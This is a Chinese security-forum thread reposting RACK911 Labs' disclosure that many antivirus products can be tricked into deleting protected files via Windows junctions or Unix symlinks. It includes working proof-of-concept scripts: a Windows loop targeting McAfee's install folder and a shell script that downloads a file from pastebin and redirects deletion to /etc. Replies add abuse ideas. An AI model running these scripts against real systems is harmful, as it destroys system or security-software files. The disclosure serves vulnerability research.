吾爱破解 - 52pojie.cn

 找回密码
 注册[Register]

QQ登录

只需一步,快速开始

查看: 8012|回复: 24
收起左侧

[漏洞分析] 【转载】部分杀软漏洞可以破坏其自身或系统

[复制链接]
huangsijun17 发表于 2020-4-22 13:10
原帖地址:https://www.rack911labs.com/research/exploiting-almost-every-antivirus-software/
原作者:RACK911 Labs

思路:使用Windows的目录连接或macOS和Linux的符号链接将反病毒软件转变为自我毁灭的工具。

原理:防病毒软件会实时或间断性得执行"实时扫描",如果发现可疑程序,则该文件会被自动隔离并移动到安全位置,等待用户确认如何处理。由于这一工作原理,且几乎所有反病毒软件都在最高权限运行,包括进行文件操作时。那么,恶意程序就可以利用这一特性,在反病毒软件扫描后、清理操作之前的时间窗口里,将被扫描成可疑的文件替换为其他文件的符号链接,从而实现提权删除指定文件。

由于默认情况下,Windows的目录连接或macOS和Linux的符号链接无需最高权限,极易被利用。

[Bash shell] 纯文本查看 复制代码
Windows验证代码(McAfee为例)
:loop
rd /s /q C:\Users\Username\Desktop\exploit
mkdir C:\Users\Username\Desktop\exploit
echo X5O!P%@AP[4\PZX54(P^^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H* > C:\Users\Username\Desktop\exploit\EpSecApiLib.dll
rd /s /q C:\Users\Username\Desktop\exploit
mklink /J C:\Users\Username\Desktop\exploit “C:\Program Files (x86)\McAfee\Endpoint Security\Endpoint Security Platform”
goto loop



[Bash shell] 纯文本查看 复制代码
macOS&Linux验证代码(系统密码存储文件为例)
#!/bin/sh
rm -rf /Users/Username/exploit ; mkdir /Users/Username/exploit
curl -k https://pastebin.com/raw/jZJ6Ekzt > /Users/Username/exploit/passwd
sleep 6
rm -rf /Users/Username/exploit ; ln -s /etc /Users/Username/exploit


验证视频详见原网址。

受影响的软件

Windows平台:

Avast Free Anti-Virus
Avira Free Anti-Virus
BitDefender GravityZone
Comodo Endpoint Security
F-Secure Computer Protection
FireEye Endpoint Security
Intercept X (Sophos)
Kaspersky Endpoint Security
Malwarebytes for Windows
McAfee Endpoint Security
Panda Dome
Webroot Secure Anywhere

MacOS:

AVG
BitDefender Total Security
Eset Cyber Security
Kaspersky Internet Security
McAfee Total Protection
Microsoft Defender (BETA)
Norton Security
Sophos Home
Webroot Secure Anywhere

Linux:

BitDefender GravityZone
Comodo Endpoint Security
Eset File Server Security
F-Secure Linux Security
Kaspersy Endpoint Security
McAfee Endpoint Security
Sophos Anti-Virus for Linux

免费评分

参与人数 6吾爱币 +3 热心值 +5 收起 理由
小白287 -2 谢谢@Thanks!
lbtx456 + 1 + 1 我很赞同!
女萝岩 + 1 + 1 我很赞同!
Conquest + 1 + 1 用心讨论,共获提升!
贝木尼舟 + 1 + 1 我很赞同!
dldl + 1 + 1 谢谢@Thanks!

查看全部评分

发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。

fc4lee 发表于 2020-4-22 21:50
其实还有个可以利用的机制,就是隔离区这个,一般杀毒软件都得安装在系统盘符,隔离区一般默认也设置在系统盘符,隔离区也会随着隔离文件的日益增多而越来越臃肿庞大(几乎很少用户会取消隔离区或者定期清理隔离区),肯定可以构造把磁盘填满无法正常开机的恶意代码,这是毋庸置疑的
 楼主| huangsijun17 发表于 2020-4-22 13:28
我的爱是你 发表于 2020-4-22 13:24
这是借刀杀人。
很不错那么怎么判断杀软将其判为可疑软件呢,还是说释放个必定被杀软检测的软件 随后借其 ...

验证代码里面有……
境外实验室都实测出一串软件了。
我的爱是你 发表于 2020-4-22 13:24
本帖最后由 我的爱是你 于 2020-4-22 13:26 编辑

这是借刀杀人。
很不错那么怎么判断杀软将其判为可疑软件呢,还是说释放个必定被杀软检测的软件 随后借其之手破坏系统文件。
Xw丶小威 发表于 2020-4-22 13:29
好一个偷梁换柱,好一个借刀杀人。
余佳卓 发表于 2020-4-22 13:57
长见识了
春天的萌动 发表于 2020-4-22 14:02
那样怎么解决呢?
 楼主| huangsijun17 发表于 2020-4-22 14:04

等杀软更新……
列表里的软件,境外的实验室都通知了。
那年夏天52 发表于 2020-4-22 14:11
比如我杀我自己???
Ldfd 发表于 2020-4-22 14:14
自己打残自己,残忍
gky86886 发表于 2020-4-22 14:31
还是裸奔安全

您需要登录后才可以回帖 登录 | 注册[Register]

本版积分规则

返回列表

RSS订阅|小黑屋|处罚记录|联系我们|吾爱破解 - LCG - LSG ( 京ICP备16042023号 | 京公网安备 11010502030087号 )

GMT+8, 2024-11-1 07:34

Powered by Discuz!

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表